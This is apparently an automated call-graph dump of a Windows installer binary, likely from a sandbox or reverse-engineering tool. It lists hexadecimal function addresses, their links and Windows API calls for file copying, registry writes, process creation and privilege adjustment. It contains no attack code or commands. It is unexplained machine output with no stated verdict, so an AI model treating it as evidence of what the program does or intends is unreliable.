5197 4016fe 5196->5197 5197->5199 5200 406284 lstrcpynW 5197->5200 5199->5194 5199->5195 5200->5199 5201 40234e 5202 402c41 17 API calls 5201->5202 5203 40235d 5202->5203 5204 402c41 17 API calls 5203->5204 5205 402366 5204->5205 5206 402c41 17 API calls 5205->5206 5207 402370 GetPrivateProfileStringW 5206->5207 5208 401b53 5209 402c41 17 API calls 5208->5209 5210 401b5a 5209->5210 5211 402c1f 17 API calls 5210->5211 5212 401b63 wsprintfW 5211->5212 5213 402ac5 5212->5213 5214 6ff410e1 5215 6ff41111 5214->5215 5216 6ff411d8 GlobalFree 5215->5216 5217 6ff412ba 2 API calls 5215->5217 5218 6ff411d3 5215->5218 5219 6ff41272 2 API calls 5215->5219 5220 6ff41164 GlobalAlloc 5215->5220 5221 6ff411f8 GlobalFree 5215->5221 5222 6ff411c4 GlobalFree 5215->5222 5223 6ff412e1 lstrcpyW 5215->5223 5217->5215 5218->5216 5219->5222 5220->5215 5221->5215 5222->5215 5223->5215 5224 401956 5225 402c41 17 API calls 5224->5225 5226 40195d lstrlenW 5225->5226 5227 402592 5226->5227 4856 4014d7 4857 402c1f 17 API calls 4856->4857 4858 4014dd Sleep 4857->4858 4860 402ac5 4858->4860 5228 401f58 5229 402c41 17 API calls 5228->5229 5230 401f5f 5229->5230 5231 4065c7 2 API calls 5230->5231 5232 401f65 5231->5232 5234 401f76 5232->5234 5235 4061cb wsprintfW 5232->5235 5235->5234 4861 403359 SetErrorMode GetVersion 4862 403398 4861->4862 4863 40339e 4861->4863 4864 40665e 5 API calls 4862->4864 4865 4065ee 3 API calls 4863->4865 4864->4863 4866 4033b4 lstrlenA 4865->4866 4866->4863 4867 4033c4 4866->4867 4868 40665e 5 API calls 4867->4868 4869 4033cb 4868->4869 4870 40665e 5 API calls 4869->4870 4871 4033d2 4870->4871 4872 40665e 5 API calls 4871->4872 4873 4033de #17 OleInitialize SHGetFileInfoW 4872->4873 4951 406284 lstrcpynW 4873->4951 4876 40342a GetCommandLineW 4952 406284 lstrcpynW 4876->4952 4878 40343c 4879 405b86 CharNextW 4878->4879 4880 403461 CharNextW 4879->4880 4881 40358b GetTempPathW 4880->4881 4886 40347a 4880->4886 4953 403328 4881->4953 4883 4035a3 4884 4035a7 GetWindowsDirectoryW lstrcatW 4883->4884 4885 4035fd DeleteFileW 4883->4885 4887 403328 12 API calls 4884->4887 4963 402edd GetTickCount GetModuleFileNameW 4885->4963 4888 405b86 CharNextW 4886->4888 4893 403574 4886->4893 4895 403576 4886->4895 4891 4035c3 4887->4891 4888->4886 4890 403611 4897 405b86 CharNextW 4890->4897 4933 4036b4 4890->4933 4946 4036c4 4890->4946 4891->4885 4892 4035c7 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4891->4892 4896 403328 12 API calls 4892->4896 4893->4881 5047 406284 lstrcpynW 4895->5047 4901 4035f5 4896->4901 4902 403630 4897->4902 4901->4885 4901->4946 4909 4036f4 4902->4909 4910 40368e 4902->4910 4903 4037fe 4906 403882 ExitProcess 4903->4906 4907 403806 GetCurrentProcess OpenProcessToken 4903->4907 4904 4036de 4905 4058ea MessageBoxIndirectW 4904->4905 4911 4036ec ExitProcess 4905->4911 4912 403852 4907->4912 4913 40381e LookupPrivilegeValueW AdjustTokenPrivileges 4907->4913 4916 405855 5 API calls 4909->4916 4915 405c61 18 API calls 4910->4915 4914 40665e 5 API calls 4912->4914 4913->4912 4917 403859 4914->4917 4918 40369a 4915->4918 4919 4036f9 lstrcatW 4916->4919 4920 40386e ExitWindowsEx 4917->4920 4924 40387b 4917->4924 4918->4946 5048 406284 lstrcpynW 4918->5048 4921 403715 lstrcatW lstrcmpiW 4919->4921 4922 40370a lstrcatW 4919->4922 4920->4906 4920->4924 4923 403731 4921->4923 4921->4946 4922->4921 4927 403736 4923->4927 4928 40373d 4923->4928 4929 40140b 2 API calls 4924->4929 4926 4036a9 5049 406284 lstrcpynW 4926->5049 4931 4057bb 4 API calls 4927->4931 4932 405838 2 API calls 4928->4932 4929->4906 4934 40373b 4931->4934 4935 403742 SetCurrentDirectoryW 4932->4935 4991 403974 4933->4991 4934->4935 4936 403752 4935->4936 4937 40375d 4935->4937 5057 406284 lstrcpynW 4936->5057 5058 406284 lstrcpynW 4937->5058 4940 4062a6 17 API calls 4941 40379c DeleteFileW 4940->4941 4942 4037a9 CopyFileW 4941->4942 4948 40376b 4941->4948 4942->4948 4943 4037f2 4945 40604a 36 API calls 4943->4945 4944 40604a 36 API calls 4944->4948 4945->4946 5050 40389a 4946->5050 4947 4062a6 17 API calls 4947->4948 4948->4940 4948->4943 4948->4944 4948->4947 4950 4037dd CloseHandle 4948->4950 5059 40586d CreateProcessW 4948->5059 4950->4948 4951->4876 4952->4878 4954 406518 5 API calls 4953->4954 4955 403334 4954->4955 4956 40333e 4955->4956 4957 405b59 3 API calls 4955->4957 4956->4883 4958 403346 4957->4958 4959 405838 2 API calls 4958->4959 4960 40334c 4959->4960 5062 405da9 4960->5062 5066 405d7a GetFileAttributesW CreateFileW 4963->5066 4965 402f1d 4985 402f2d 4965->4985 5067 406284 lstrcpynW 4965->5067 4967 402f43 4968 405ba5 2 API calls 4967->4968 4969 402f49 4968->4969 5068 406284 lstrcpynW 4969->5068 4971 402f54 GetFileSize 4972 403050 4971->4972 4990 402f6b 4971->4990 5069 402e79 4972->5069 4974 403059 4976 403089 GlobalAlloc 4974->4976 4974->4985 5081 403311 SetFilePointer 4974->5081 4975 4032fb ReadFile 4975->4990 5080 403311 SetFilePointer 4976->5080 4978 4030bc 4982 402e79 6 API calls 4978->4982 4980 403072 4983 4032fb ReadFile 4980->4983 4981 4030a4 4984 403116 35 API calls 4981->4984 4982->4985 4986 40307d 4983->4986 4988 4030b0 4984->4988 4985->4890 4986->4976 4986->4985 4987 402e79 6 API calls 4987->4990 4988->4985 4988->4988 4989 4030ed SetFilePointer 4988->4989 4989->4985 4990->4972 4990->4975 4990->4978 4990->4985 4990->4987 4992 40665e 5 API calls 4991->4992 4993 403988 4992->4993 4994 4039a0 4993->4994 4995 40398e 4993->4995 4996 406152 3 API calls 4994->4996 5094 4061cb wsprintfW 4995->5094 4997 4039d0 4996->4997 4998 4039ef lstrcatW 4997->4998 5000 406152 3 API calls 4997->5000 5001 40399e 4998->5001 5000->4998 5086 403c4a 5001->5086 5004 405c61 18 API calls 5005 403a21 5004->5005 5006 403ab5 5005->5006 5008 406152 3 API calls 5005->5008 5007 405c61 18 API calls 5006->5007 5009 403abb 5007->5009 5011 403a53 5008->5011 5010 403acb LoadImageW 5009->5010 5012 4062a6 17 API calls 5009->5012 5013 403b71 5010->5013 5014 403af2 RegisterClassW 5010->5014 5011->5006 5015 403a74 lstrlenW 5011->5015 5018 405b86 CharNextW 5011->5018 5012->5010 5017 40140b 2 API calls 5013->5017 5016 403b28 SystemParametersInfoW CreateWindowExW 5014->5016 5046 403b7b 5014->5046 5019 403a82 lstrcmpiW 5015->5019 5020 403aa8 5015->5020 5016->5013 5021 403b77 5017->5021 5022 403a71 5018->5022 5019->5020 5023 403a92 GetFileAttributesW 5019->5023 5024 405b59 3 API calls 5020->5024 5026 403c4a 18 API calls 5021->5026 5021->5046 5022->5015 5025 403a9e 5023->5025 5027 403aae 5024->5027 5025->5020 5028 405ba5 2 API calls 5025->5028 5029 403b88 5026->5029 5095 406284 lstrcpynW 5027->5095 5028->5020 5031 403b94 ShowWindow 5029->5031 5032 403c17 5029->5032 5034 4065ee 3 API calls 5031->5034 5033 4053bf 5 API calls 5032->5033 5035 403c1d 5033->5035 5036 403bac 5034->5036 5037 403c21 5035->5037 5038 403c39 5035->5038 5039 403bba GetClassInfoW 5036->5039 5041 4065ee 3 API calls 5036->5041 5045 40140b 2 API calls 5037->5045 5037->5046 5040 40140b 2 API calls 5038->5040 5042 403be4 DialogBoxParamW 5039->5042 5043 403bce GetClassInfoW RegisterClassW 5039->5043 5040->5046 5041->5039 5044 40140b 2 API calls 5042->5044 5043->5042 5044->5046 5045->5046 5046->4946 5047->4893 5048->4926 5049->4933 5051 4038b2 5050->5051 5052 4038a4 CloseHandle 5050->5052 5097 4038df 5051->5097 5052->5051 5055 405996 67 API calls 5056 4036cd OleUninitialize 5055->5056 5056->4903 5056->4904 5057->4937 5058->4948 5060 4058a0 CloseHandle 5059->5060 5061 4058ac 5059->5061 5060->5061 5061->4948 5063 405db6 GetTickCount GetTempFileNameW 5062->5063 5064 403357 5063->5064 5065 405dec 5063->5065 5064->4883 5065->5063 5065->5064 5066->4965 5067->4967 5068->4971 5070 402e82 5069->5070 5071 402e9a 5069->5071 5072 402e92 5070->5072 5073 402e8b DestroyWindow 5070->5073 5074 402ea2 5071->5074 5075 402eaa GetTickCount 5071->5075 5072->4974 5073->5072 5082 40669a 5074->5082 5077 402eb8 CreateDialogParamW ShowWindow 5075->5077 5078 402edb 5075->5078 5077->5078 5078->4974 5080->4981 5081->4980 5083 4066b7 PeekMessageW 5082->5083 5084 402ea8 5083->5084 5085 4066ad DispatchMessageW 5083->5085 5084->4974 5085->5083 5087 403c5e 5086->5087 5096 4061cb wsprintfW 5087->5096 5089 403ccf 5090 403d03 18 API calls 5089->5090 5092 403cd4 5090->5092 5091 4039ff 5091->5004 5092->5091 5093 4062a6 17 API calls 5092->5093 5093->5092 5094->5001 5095->5006 5096->5089 5098 4038ed 5097->5098 5099 4038b7 5098->5099 5100 4038f2 FreeLibrary GlobalFree 5098->5100 5099->5055 5100->5099 5100->5100 5236 402259 5237 402c41 17 API calls 5236->5237 5238 40225f 5237->5238 5239 402c41 17 API calls 5238->5239 5240 402268 5239->5240 5241 402c41 17 API calls 5240->5241 5242 402271 5241->5242 5243 4065c7 2 API calls 5242->5243 5244 40227a 5243->5244 5245 40228b lstrlenW lstrlenW 5244->5245 5246 40227e 5244->5246 5248 4052ec 24 API calls 5245->5248 5247 4052ec 24 API calls 5246->5247 5250 402286 5247->5250 5249 4022c9 SHFileOperationW 5248->5249 5249->5246 5249->5250 5115 40175c 5116 402c41 17 API calls 5115->5116 5117 401763 5116->5117 5118 405da9 2 API calls 5117->5118 5119 40176a 5118->5119 5120 405da9 2 API calls 5119->5120 5120->5119 5258 401d5d GetDlgItem GetClientRect 5259 402c41 17 API calls 5258->5259 5260 401d8f LoadImageW SendMessageW 5259->5260 5261 402ac5 5260->5261 5262 401dad DeleteObject 5260->5262 5262->5261 5263 4022dd 5264 4022e4 5263->5264 5267 4022f7 5263->5267 5265 4062a6 17 API calls 5264->5265 5266 4022f1 5265->5266 5268 4058ea MessageBoxIndirectW 5266->5268 5268->5267 5269 405260 5270 405270 5269->5270 5271 405284 5269->5271 5272 405276 5270->5272 5281 4052cd 5270->5281 5273 40528c IsWindowVisible 5271->5273 5279 4052a3 5271->5279 5274 404247 SendMessageW 5272->5274 5275 405299 5273->5275 5273->5281 5277 405280 5274->5277 5282 404bb6 SendMessageW 5275->5282 5276 4052d2 CallWindowProcW 5276->5277 5279->5276 5287 404c36 5279->5287 5281->5276 5283 404c15 SendMessageW 5282->5283 5284 404bd9 GetMessagePos ScreenToClient SendMessageW 5282->5284 5286 404c0d 5283->5286 5285 404c12 5284->5285 5284->5286 5285->5283 5286->5279 5296 406284 lstrcpynW 5287->5296 5289 404c49 5297 4061cb wsprintfW 5289->5297 5291 404c53 5292 40140b 2 API calls 5291->5292 5293 404c5c 5292->5293 5298 406284 lstrcpynW 5293->5298 5295 404c63 5295->5281 5296->5289 5297->5291 5298->5295 5299 401563 5300 402a6b 5299->5300 5303 4061cb wsprintfW 5300->5303 5302 402a70 5303->5302 5304 4023e4 5305 402c41 17 API calls 5304->5305 5306 4023f6 5305->5306 5307 402c41 17 API calls 5306->5307 5308 402400 5307->5308 5321 402cd1 5308->5321 5311 402438 5314 402444 5311->5314 5316 402c1f 17 API calls 5311->5316 5312 40288b 5313 402c41 17 API calls 5315 40242e lstrlenW 5313->5315 5317 402463 RegSetValueExW 5314->5317 5318 403116 35 API calls 5314->5318 5315->5311 5316->5314 5319 402479 RegCloseKey 5317->5319 5318->5317 5319->5312 5322 402cec 5321->5322 5325 40611f 5322->5325 5326 40612e 5325->5326 5327 402410 5326->5327 5328 406139 RegCreateKeyExW 5326->5328 5327->5311 5327->5312 5327->5313 5328->5327 5329 404c68 GetDlgItem GetDlgItem 5330 404cba 7 API calls 5329->5330 5334 404ed3 5329->5334 5331 404d50 SendMessageW 5330->5331 5332 404d5d DeleteObject 5330->5332 5331->5332 5333 404d66 5332->5333 5335 404d9d 5333->5335 5336 4062a6 17 API calls 5333->5336 5347 404bb6 5 API calls 5334->5347 5352 404fb7 5334->5352 5364 404f44 5334->5364 5337 4041fb 18 API calls 5335->5337 5339 404d7f SendMessageW SendMessageW 5336->5339 5342 404db1 5337->5342 5338 405063 5340 405075 5338->5340 5341 40506d SendMessageW 5338->5341 5339->5333 5353 405087 ImageList_Destroy 5340->5353 5354 40508e 5340->5354 5358 40509e 5340->5358 5341->5340 5348 4041fb 18 API calls 5342->5348 5343 404ec6 5345 404262 8 API calls 5343->5345 5344 405010 SendMessageW 5344->5343 5350 405025 SendMessageW 5344->5350 5351 405259 5345->5351 5346 404fa9 SendMessageW 5346->5352 5347->5364 5361 404dbf 5348->5361 5349 40520d 5349->5343 5359 40521f ShowWindow GetDlgItem ShowWindow 5349->5359 5355 405038 5350->5355 5352->5338 5352->5343 5352->5344 5353->5354 5356 405097 GlobalFree 5354->5356 5354->5358 5366 405049 SendMessageW 5355->5366 5356->5358 5357 404e94 GetWindowLongW SetWindowLongW 5360 404ead 5357->5360 5358->5349 5372 404c36 4 API calls 5358->5372 5376 4050d9 5358->5376 5359->5343 5362 404eb3 ShowWindow 5360->5362 5363 404ecb 5360->5363 5361->5357 5365 404e0f SendMessageW 5361->5365 5367 404e8e 5361->5367 5370 404e4b SendMessageW 5361->5370 5371 404e5c SendMessageW 5361->5371 5380 404230 SendMessageW 5362->5380 5381 404230 SendMessageW 5363->5381 5364->5346 5364->5352 5365->5361 5366->5338 5367->5357 5367->5360 5370->5361 5371->5361 5372->5376 5373 4051e3 InvalidateRect 5373->5349 5374 4051f9 5373->5374 5382 404b71 5374->5382 5375 405107 SendMessageW 5379 40511d 5375->5379 5376->5375 5376->5379 5378 405191 SendMessageW SendMessageW 5378->5379 5379->5373 5379->5378 5380->5343 5381->5334 5385 404aa8 5382->5385 5384 404b86 5384->5349 5386 404ac1 5385->5386 5387 4062a6 17 API calls 5386->5387 5388 404b25 5387->5388 5389 4062a6 17 API calls 5388->5389 5390 404b30 5389->5390 5391 4062a6 17 API calls 5390->5391 5392 404b46 lstrlenW wsprintfW SetDlgItemTextW 5391->5392 5392->5384 5393 402868 5394 402c41 17 API calls 5393->5394 5395 40286f FindFirstFileW 5394->5395 5396 402897 5395->5396 5400 402882 5395->5400 5401 4061cb wsprintfW 5396->5401 5398 4028a0 5402 406284 lstrcpynW 5398->5402 5401->5398 5402->5400 5403 401968 5404 402c1f 17 API calls 5403->5404 5405 40196f 5404->5405 5406 402c1f 17 API calls 5405->5406 5407 40197c 5406->5407 5408 402c41 17 API calls 5407->5408 5409 401993 lstrlenW 5408->5409 5411 4019a4 5409->5411 5410 4019e5 5411->5410 5415 406284 lstrcpynW 5411->5415 5413 4019d5 5413->5410 5414 4019da lstrlenW 5413->5414 5414->5410 5415->5413 5416 6ff418dd 5417 6ff41900 5416->5417 5418 6ff41935 GlobalFree 5417->5418 5419 6ff41947 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5417->5419 5418->5419 5420 6ff41272 2 API calls 5419->5420 5421 6ff41ad2 GlobalFree GlobalFree 5420->5421 5422 40166a 5423 402c41 17 API calls 5422->5423 5424 401670 5423->5424 5425 4065c7 2 API calls 5424->5425 5426 401676 5425->5426 5427 40436b lstrlenW 5428 40438a 5427->5428 5429 40438c WideCharToMultiByte 5427->5429 5428->5429 5430 6ff416d8 5431 6ff41707 5430->5431 5432 6ff41b63 22 API calls 5431->5432 5433 6ff4170e 5432->5433 5434 6ff41715 5433->5434 5435 6ff41721 5433->5435 5436 6ff41272 2 API calls 5434->5436 5437 6ff41748 5435->5437 5438 6ff4172b 5435->5438 5445 6ff4171f 5436->5445 5440 6ff41772 5437->5440 5441 6ff4174e 5437->5441 5439 6ff4153d 3 API calls 5438->5439 5443 6ff41730 5439->5443 5442 6ff4153d 3 API calls 5440->5442 5444 6ff415b4 3 API calls 5441->5444 5442->5445 5446 6ff415b4 3 API calls 5443->5446 5447 6ff41753 5444->5447 5448 6ff41736 5446->5448 5449 6ff41272 2 API calls 5447->5449 5451 6ff41272 2 API calls 5448->5451 5450 6ff41759 GlobalFree 5449->5450 5450->5445 5452 6ff4176d GlobalFree 5450->5452 5453 6ff4173c GlobalFree 5451->5453 5452->5445 5453->5445 5454 4046ec 5455 404718 5454->5455 5456 404729 5454->5456 5515 4058ce GetDlgItemTextW 5455->5515 5458 404735 GetDlgItem 5456->5458 5463 404794 5456->5463 5460 404749 5458->5460 5459 404723 5462 406518 5 API calls 5459->5462 5466 40475d SetWindowTextW 5460->5466 5471 405c04 4 API calls 5460->5471 5461 404878 5464 404a27 5461->5464 5517 4058ce GetDlgItemTextW 5461->5517 5462->5456 5463->5461 5463->5464 5467 4062a6 17 API calls 5463->5467 5470 404262 8 API calls 5464->5470 5469 4041fb 18 API calls 5466->5469 5473 404808 SHBrowseForFolderW 5467->5473 5468 4048a8 5474 405c61 18 API calls 5468->5474 5475 404779 5469->5475 5476 404a3b 5470->5476 5472 404753 5471->5472 5472->5466 5480 405b59 3 API calls 5472->5480 5473->5461 5477 404820 CoTaskMemFree 5473->5477 5478 4048ae 5474->5478 5479 4041fb 18 API calls 5475->5479 5481 405b59 3 API calls 5477->5481 5518 406284 lstrcpynW 5478->5518 5482 404787 5479->5482 5480->5466 5483 40482d 5481->5483 5516 404230 SendMessageW 5482->5516 5486 404864 SetDlgItemTextW 5483->5486 5491 4062a6 17 API calls 5483->5491 5486->5461 5487 40478d 5489 40665e 5 API calls 5487->5489 5488 4048c5 5490 40665e 5 API calls 5488->5490 5489->5463 5497 4048cc 5490->5497 5492 40484c lstrcmpiW 5491->5492 5492->5486 5495 40485d lstrcatW 5492->5495 5493 40490d 5519 406284 lstrcpynW 5493->5519 5495->5486 5496 404914 5498 405c04 4 API calls 5496->5498 5497->5493 5501 405ba5 2 API calls 5497->5501 5503 404965 5497->5503 5499 40491a GetDiskFreeSpaceW 5498->5499 5502 40493e MulDiv 5499->5502 5499->5503 5501->5497 5502->5503 5504 4049d6 5503->5504 5506 404b71 20 API calls 5503->5506 5505 4049f9 5504->5505 5507 40140b 2 API calls 5504->5507 5520 40421d KiUserCallbackDispatcher 5505->5520 5508 4049c3 5506->5508 5507->5505 5510 4049d8 SetDlgItemTextW 5508->5510 5511 4049c8 5508->5511 5510->5504 5513 404aa8 20 API calls 5511->5513 5512 404a15 5512->5464 5521 404645 5512->5521 5513->5504 5515->5459 5516->5487 5517->5468 5518->5488 5519->5496 5520->5512 5522 404653 5521->5522 5523 404658 SendMessageW 5521->5523 5522->5523 5523->5464 5524 6ff41058 5526 6ff41074 5524->5526 5525 6ff410dd 5526->5525 5527 6ff41516 GlobalFree 5526->5527 5528 6ff41092 5526->5528 5527->5528 5529 6ff41516 GlobalFree 5528->5529 5530 6ff410a2 5529->5530 5531 6ff410b2 5530->5531 5532 6ff410a9 GlobalSize 5530->5532 5533 6ff410b6 GlobalAlloc 5531->5533 5534 6ff410c7 5531->5534 5532->5531 5535 6ff4153d 3 API calls 5533->5535 5536 6ff410d2 GlobalFree 5534->5536 5535->5534 5536->5525 4568 40176f 4569 402c41 17 API calls 4568->4569 4570 401776 4569->4570 4571 401796 4570->4571 4572 40179e 4570->4572 4628 406284 lstrcpynW 4571->4628 4629 406284 lstrcpynW 4572->4629 4575 40179c 4579 406518 5 API calls 4575->4579 4576 4017a9 4577 405b59 3 API calls 4576->4577 4578 4017af lstrcatW 4577->4578 4578->4575 4596 4017bb 4579->4596 4580 4065c7 2 API calls 4580->4596 4581 405d55 2 API calls 4581->4596 4583 4017cd CompareFileTime 4583->4596 4584 40188d 4586 4052ec 24 API calls 4584->4586 4585 401864 4587 4052ec 24 API calls 4585->4587 4605 401879 4585->4605 4589 401897 4586->4589 4587->4605 4588 406284 lstrcpynW 4588->4596 4607 403116 4589->4607 4592 4018be SetFileTime 4593 4018d0 CloseHandle 4592->4593 4595 4018e1 4593->4595 4593->4605 4594 4062a6 17 API calls 4594->4596 4597 4018e6 4595->4597 4598 4018f9 4595->4598 4596->4580 4596->4581 4596->4583 4596->4584 4596->4585 4596->4588 4596->4594 4606 405d7a GetFileAttributesW CreateFileW 4596->4606 4630 4058ea 4596->4630 4599 4062a6 17 API calls 4597->4599 4600 4062a6 17 API calls 4598->4600 4601 4018ee lstrcatW 4599->4601 4602 401901 4600->4602 4601->4602 4604 4058ea MessageBoxIndirectW 4602->4604 4604->4605 4606->4596 4608 40312f 4607->4608 4609 40315a 4608->4609 4644 403311 SetFilePointer 4608->4644 4634 4032fb 4609->4634 4613 403177 GetTickCount 4624 40318a 4613->4624 4614 40329b 4615 40329f 4614->4615 4619 4032b7 4614->4619 4617 4032fb ReadFile 4615->4617 4616 4018aa 4616->4592 4616->4593 4617->4616 4618 4032fb ReadFile 4618->4619 4619->4616 4619->4618 4621 405e2c WriteFile 4619->4621 4620 4032fb ReadFile 4620->4624 4621->4619 4623 4031f0 GetTickCount 4623->4624 4624->4616 4624->4620 4624->4623 4625 403219 MulDiv wsprintfW 4624->4625 4627 405e2c WriteFile 4624->4627 4637 4067df 4624->4637 4626 4052ec 24 API calls 4625->4626 4626->4624 4627->4624 4628->4575 4629->4576 4633 4058ff 4630->4633 4631 40594b 4631->4596 4632 405913 MessageBoxIndirectW 4632->4631 4633->4631 4633->4632 4635 405dfd ReadFile 4634->4635 4636 403165 4635->4636 4636->4613 4636->4614 4636->4616 4638 406804 4637->4638 4639 40680c 4637->4639 4638->4624 4639->4638 4640 406893 GlobalFree 4639->4640 4641 40689c GlobalAlloc 4639->4641 4642 406913 GlobalAlloc 4639->4642 4643 40690a GlobalFree 4639->4643 4640->4641 4641->4638 4641->4639 4642->4638 4642->4639 4643->4642 4644->4609 5537 4027ef 5538 4027f6 5537->5538 5540 402a70 5537->5540 5539 402c1f 17 API calls 5538->5539 5541 4027fd 5539->5541 5542 40280c SetFilePointer 5541->5542 5542->5540 5543 40281c 5542->5543 5545 4061cb wsprintfW 5543->5545 5545->5540 5546 401a72 5547 402c1f 17 API calls 5546->5547 5548 401a7b 5547->5548 5549 402c1f 17 API calls 5548->5549 5550 401a20 5549->5550 5558 401573 5559 401583 ShowWindow 5558->5559 5560 40158c 5558->5560 5559->5560 5561 402ac5 5560->5561 5562 40159a ShowWindow 5560->5562 5562->5561 5563 401cf3 5564 402c1f 17 API calls 5563->5564 5565 401cf9 IsWindow 5564->5565 5566 401a20 5565->5566 5567 402df3 5568 402e05 SetTimer 5567->5568 5569 402e1e 5567->5569 5568->5569 5570 402e73 5569->5570 5571 402e38 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5569->5571 5571->5570 5572 4014f5 SetForegroundWindow 5573 402ac5 5572->5573 5574 402576 5575 402c41 17 API calls 5574->5575 5576 40257d 5575->5576 5579 405d7a GetFileAttributesW CreateFileW 5576->5579 5578 402589 5579->5578 4833 401b77 4834 401b84 4833->4834 4835 401bc8 4833->4835 4838 401c0d 4834->4838 4843 401b9b 4834->4843 4836 401bf2 GlobalAlloc 4835->4836 4837 401bcd 4835->4837 4839 4062a6 17 API calls 4836->4839 4847 4022f7 4837->4847 4854 406284 lstrcpynW 4837->4854 4840 4062a6 17 API calls 4838->4840 4838->4847 4839->4838 4842 4022f1 4840->4842 4848 4058ea MessageBoxIndirectW 4842->4848 4852 406284 lstrcpynW 4843->4852 4844 401bdf GlobalFree 4844->4847 4846 401baa 4853 406284 lstrcpynW 4846->4853 4848->4847 4850 401bb9 4855 406284 lstrcpynW 4850->4855 4852->4846 4853->4850 4854->4844 4855->4847 5580 4024f8 5590 402c81 5580->5590 5583 402c1f 17 API calls 5584 40250b 5583->5584 5585 40288b 5584->5585 5586 402533 RegEnumValueW 5584->5586 5587 402527 RegEnumKeyW 5584->5587 5588 402548 RegCloseKey 5586->5588 5587->5588 5588->5585 5591 402c41 17 API calls 5590->5591 5592 402c98 5591->5592 5593 4060f1 RegOpenKeyExW 5592->5593 5594 402502 5593->5594 5594->5583 5101 40167b 5102 402c41 17 API calls 5101->5102 5103 401682 5102->5103 5104 402c41 17 API calls 5103->5104 5105 40168b 5104->5105 5106 402c41 17 API calls 5105->5106 5107 401694 MoveFileW 5106->5107 5108 4016a7 5107->5108 5114 4016a0 5107->5114 5109 4065c7 2 API calls 5108->5109 5112 402250 5108->5112 5111 4016b6 5109->5111 5110 401423 24 API calls 5110->5112 5111->5112 5113 40604a 36 API calls 5111->5113 5113->5114 5114->5110 5595 6ff42c4f 5596 6ff42c67 5595->5596 5597 6ff4158f 2 API calls 5596->5597 5598 6ff42c82 5597->5598 5599 401e7d 5600 402c41 17 API calls 5599->5600 5601 401e83 5600->5601 5602 402c41 17 API calls 5601->5602 5603 401e8c 5602->5603 5604 402c41 17 API calls 5603->5604 5605 401e95 5604->5605 5606 402c41 17 API calls 5605->5606 5607 401e9e 5606->5607 5608 401423 24 API calls 5607->5608 5609 401ea5 5608->5609 5616 4058b0 ShellExecuteExW 5609->5616 5611 401ee7 5613 40288b 5611->5613 5617 40670f WaitForSingleObject 5611->5617 5614 401f01 CloseHandle 5614->5613 5616->5611 5618 406729 5617->5618 5619 40673b GetExitCodeProcess 5618->5619 5620 40669a 2 API calls 5618->5620 5619->5614 5621 406730 WaitForSingleObject 5620->5621 5621->5618 5622 4019ff 5623 402c41 17 API calls 5622->5623 5624 401a06 5623->5624 5625 402c41 17 API calls 5624->5625 5626 401a0f 5625->5626 5627 401a16 lstrcmpiW 5626->5627 5628 401a28 lstrcmpW 5626->5628 5629 401a1c 5627->5629 5628->5629 5630 401000 5631 401037 BeginPaint GetClientRect 5630->5631 5632 40100c DefWindowProcW 5630->5632 5634 4010f3 5631->5634 5635 401179 5632->5635 5636 401073 CreateBrushIndirect FillRect DeleteObject 5634->5636 5637 4010fc 5634->5637 5636->5634 5638 401102 CreateFontIndirectW 5637->5638 5639 401167 EndPaint 5637->5639 5638->5639 5640 401112 6 API calls 5638->5640 5639->5635 5640->5639 5648 401503 5649 40150b 5648->5649 5650 40151e 5648->5650 5651 402c1f 17 API calls 5649->5651 5651->5650 5652 402104 5653 402c41 17 API calls 5652->5653 5654 40210b 5653->5654 5655 402c41 17 API calls 5654->5655 5656 402115 5655->5656 5657 402c41 17 API calls 5656->5657 5658 40211f 5657->5658 5659 402c41 17 API calls 5658->5659 5660 402129 5659->5660 5661 402c41 17 API calls 5660->5661 5662 402133 5661->5662 5663 402172 CoCreateInstance 5662->5663 5664 402c41 17 API calls 5662->5664 5667 402191 5663->5667 5664->5663 5665 401423 24 API calls 5666 402250 5665->5666 5667->5665 5667->5666 5668 402484 5669 402c81 17 API calls 5668->5669 5670 40248e 5669->5670 5671 402c41 17 API calls 5670->5671 5672 402497 5671->5672 5673 4024a2 RegQueryValueExW 5672->5673 5677 40288b 5672->5677 5674 4024c8 RegCloseKey 5673->5674 5675 4024c2 5673->5675 5674->5677 5675->5674 5679 4061cb wsprintfW 5675->5679 5679->5674 5680 401f06 5681 402c41 17 API calls 5680->5681 5682 401f0c 5681->5682 5683 4052ec 24 API calls 5682->5683 5684 401f16 5683->5684 5685 40586d 2 API calls 5684->5685 5686 401f1c 5685->5686 5687 401f3f CloseHandle 5686->5687 5689 40670f 5 API calls 5686->5689 5690 40288b 5686->5690 5687->5690 5691 401f31 5689->5691 5691->5687 5693 4061cb wsprintfW 5691->5693 5693->5687 5694 6ff4103d 5697 6ff4101b 5694->5697 5698 6ff41516 GlobalFree 5697->5698 5699 6ff41020 5698->5699 5700 6ff41024 5699->5700 5701 6ff41027 GlobalAlloc 5699->5701 5702 6ff4153d 3 API calls 5700->5702 5701->5700 5703 6ff4103b 5702->5703 4558 40230c 4559 402314 4558->4559 4560 40231a 4558->4560 4561 402c41 17 API calls 4559->4561 4562 402c41 17 API calls 4560->4562 4564 402328 4560->4564 4561->4560 4562->4564 4563 402336 4566 402c41 17 API calls 4563->4566 4564->4563 4565 402c41 17 API calls 4564->4565 4565->4563 4567 40233f WritePrivateProfileStringW 4566->4567 5704 40190c 5705 401943 5704->5705 5706 402c41 17 API calls 5705->5706 5707 401948 5706->5707 5708 405996 67 API calls 5707->5708 5709 401951 5708->5709 5710 401f8c 5711 402c41 17 API calls 5710->5711 5712 401f93 5711->5712 5713 40665e 5 API calls 5712->5713 5714 401fa2 5713->5714 5715 401fbe GlobalAlloc 5714->5715 5717 402026 5714->5717 5716 401fd2 5715->5716 5715->5717 5718 40665e 5 API calls 5716->5718 5719 401fd9 5718->5719 5720 40665e 5 API calls 5719->5720 5721 401fe3 5720->5721 5721->5717 5725 4061cb wsprintfW 5721->5725 5723 402018 5726 4061cb wsprintfW 5723->5726 5725->5723 5726->5717 5727 40238e 5728 4023c1 5727->5728 5729 402396 5727->5729 5730 402c41 17 API calls 5728->5730 5731 402c81 17 API calls 5729->5731 5732 4023c8 5730->5732 5734 40239d 5731->5734 5738 402cff 5732->5738 5735 402c41 17 API calls 5734->5735 5736 4023d5 5734->5736 5737 4023ae RegDeleteValueW RegCloseKey 5735->5737 5737->5736 5739 402d13 5738->5739 5741 402d0c 5738->5741 5739->5741 5742 402d44 5739->5742 5741->5736 5743 4060f1 RegOpenKeyExW 5742->5743 5746 402d72 5743->5746 5744 402dc3 5744->5741 